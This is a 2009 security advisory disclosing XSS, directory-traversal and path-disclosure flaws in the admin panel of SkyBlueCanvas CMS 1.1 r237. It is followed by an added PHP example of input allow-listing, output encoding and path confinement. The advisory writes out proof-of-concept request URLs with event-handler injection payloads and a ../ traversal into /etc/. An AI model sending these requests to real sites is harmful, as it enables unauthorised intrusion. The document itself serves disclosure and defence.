InterN0T - Advisories Advisories that are found by members of InterN0T.

12th June 2009, 20:51
SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Version Affected: 1.1 r237 (newest version: 1.1 r246)

Info: SkyBlueCanvas Lightweight CMS is an open source, free
content management system written in PHP and built specifically
for small web sites. The entire site you are viewing is a
demonstration of the SkyBlueCanvas lightweight CMS.
SkyBlueCanvas is custom-built for those instances when more
robust systems like Joomla, WordPress and Drupal are too much
horsepower.

Credits: InterN0T

External Links:
http://www.skybluecanvas.com


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
mgroup, mgr, objtype, id & dir.

Cross Site Scripting: (requires administrator access - will not survive a login screen)
http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2
http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager

Impossible XSS: (XML errors or hidden tags preventing use of event handlers.)
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtype=">XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=editpage&id=" onfocus=alert(0) >
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS

Path Content Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/
-- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/
--=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw.

Path Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=move&id='
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media&dir=all&sub=rename&id='

-:: Solution ::-
Filter event handlers out from function calls.

Conclusion:
Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between the 5th and 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Bugtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
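
An added example, not part of the original post and not SkyBlueCanvas code: one way to handle the parameters named in the advisory on the server side, in PHP. The helper names (`clean_identifier`, `attr`, `confine_dir`) and the media base directory are assumptions; the helpers allow-list identifier parameters, encode values for quoted HTML attributes, and confine `dir` to a base directory with `realpath`.

```php
<?php
// Added example: hypothetical helpers, not SkyBlueCanvas code.

// Allow-list for identifier-style parameters (mgroup, mgr, objtype).
// The legitimate values in the advisory's URLs are plain words such as "pages" or "media".
function clean_identifier(?string $value, string $default = ''): string
{
    return ($value !== null && preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $value) === 1)
        ? $value
        : $default;
}

// Encode a value for an HTML attribute; the template must quote the attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Resolve a user-supplied directory and confine it to $baseDir.
// Returns the canonical path, or null when it escapes the base or does not exist.
function confine_dir(string $baseDir, string $userDir): ?string
{
    $base = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $userDir);
    if ($base === false || $target === false || !is_dir($target)) {
        return null;
    }
    // Compare with a trailing separator so "/media-old" does not pass for "/media".
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($target . DIRECTORY_SEPARATOR, $base) !== 0) {
        return null;
    }
    return $target;
}

// Constructed inputs modelled on the requests in the advisory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sbc_media_demo'; // assumed media root
@mkdir($base . DIRECTORY_SEPARATOR . 'pictures', 0700, true);

$mgroup = '" onmouseover=alert(0) > ';
// Encoded value stays inside the quoted attribute instead of closing it.
echo '<input name="mgroup" value="' . attr($mgroup) . '">', PHP_EOL;
// Rejected by the allow-list, so the default is used.
var_dump(clean_identifier($mgroup, 'pages'));
// A directory inside the base resolves; the traversal value does not.
var_dump(confine_dir($base, 'pictures'));
var_dump(confine_dir($base, '../../../../../../../etc/'));
```

Encoding at output covers every attribute-breaking payload at once, which a list of event-handler names cannot; the `realpath` check runs after path resolution, so `../` sequences and symlinks are both covered.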
LinkBacks to this thread (http://forum.intern0t.net/intern0t-advisories/1120-skybluecanvas-1-1-r237-multiple-vulnerabilities.html):
- CVE - CVE-2009-2116 (under review), Refback, 28th January 2010 07:45
- ISS X-Force Database: skybluecanvas-admin-path-disclosure(51164): SkyBlueCanvas admin.php path disclosure, Refback, 22nd June 2009 16:21
- SkyBlueCanvas Cross-Site Scripting Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com, Refback, 16th June 2009 15:56

All times are GMT +2.